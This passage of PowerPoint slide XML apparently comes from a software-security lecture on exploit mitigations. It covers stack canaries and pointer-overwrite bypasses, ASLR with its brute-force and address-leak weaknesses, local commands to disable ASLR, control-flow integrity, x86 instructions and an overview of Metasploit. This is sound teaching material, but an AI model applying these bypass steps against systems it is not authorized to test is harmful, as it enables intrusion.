            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canaries can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be bypassed by overflowing a pointer used as a destination of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()-like function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can overwrite the return address without touching the canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The XOR canary was introduced to protect from this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointers in the function frame can still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This require knowledge of the process memory layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: Window implements similar protection using the /GS compiler option</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31370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8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8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8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8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Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The next step is making guessing addresses hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Step 3: Address Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61620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Address Space Layout Randomization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Randomizes the position of the heap, the stack, the program’s code, and the dynamically-linked libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Library random positioning requires position-independent code (or if this is not possible, some run-time overhead to handle the mapping of references)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Makes return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attack much harder, as the location of the library code has to be guessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Depending on the implementation, libraries are randomized with 16 bits of entropy on 32-bit architectures (requires, in average 32K attempts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Still vulnerable to brute-force attack, if unlimited attempts are possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>64-bit architectures are much more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>319</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137762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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Instruction Classes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, call, ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</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iret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Values can be compared using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmp</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src</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dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> # subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> without saving the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> bits are set accordingly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (ZF=0), je (ZF=1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (CF=0), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (SF=OF), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control transfer can be direct (destination is a constant) or indirect (the destination address is the content of a register)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input/output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in, out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95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2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42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42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424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42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ASLR in Linux</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ASLR is enabled in Linux by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is implemented by the kernel in collaboration with the ELF loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exec ASLR (Requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in PIE format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More resilient to ROP attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VDSO ASLR </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72343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Exploitation under ASLR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ASLR can be disabled by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>asociated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> kernel variable to 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“0” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setarch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -m` -R /bin/bash </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR can be defeated by brute-forcing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If it is possible to limit the variation space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks can be structured in two steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address leaking (e.g., through a format string attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control flow hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54989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Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Step 4: Control Flow Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control-Flow Integrity: Principles, Implementation and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Abadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et al., CCS 2005</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141590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 Integrity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Programs have a control-flow graph (CFG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Direct or indirect control transfers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory corruption attacks often result in execution paths that do not exist in the CFG </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control Flow Integrity (CFI) enforces that execution follows the CFG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is analyzed at compile time and its CFG is derived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is then instrumented in order to check that, at run-time, the control transfer follow the established </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CFG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83709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Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a framework to support exploitation and remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed in 2003 (in Perl) by HD Moore, was rewritten in Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was acquired by Rapid7 in 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85358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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Distributions/Tools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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The basic framework (free)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Community Edition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides a web-based interface to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (free)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Express/Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commercial version of the tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Graphic management interface on top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that support collaboration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1046199145"/>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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali Linux is a Linux distribution that focuses on security and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It comes with a number of pre-installed security tools, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1053494618"/>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Process </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose an encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute the exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Components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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interactive shell for </a:t>
            </a:r>
            <a:r>
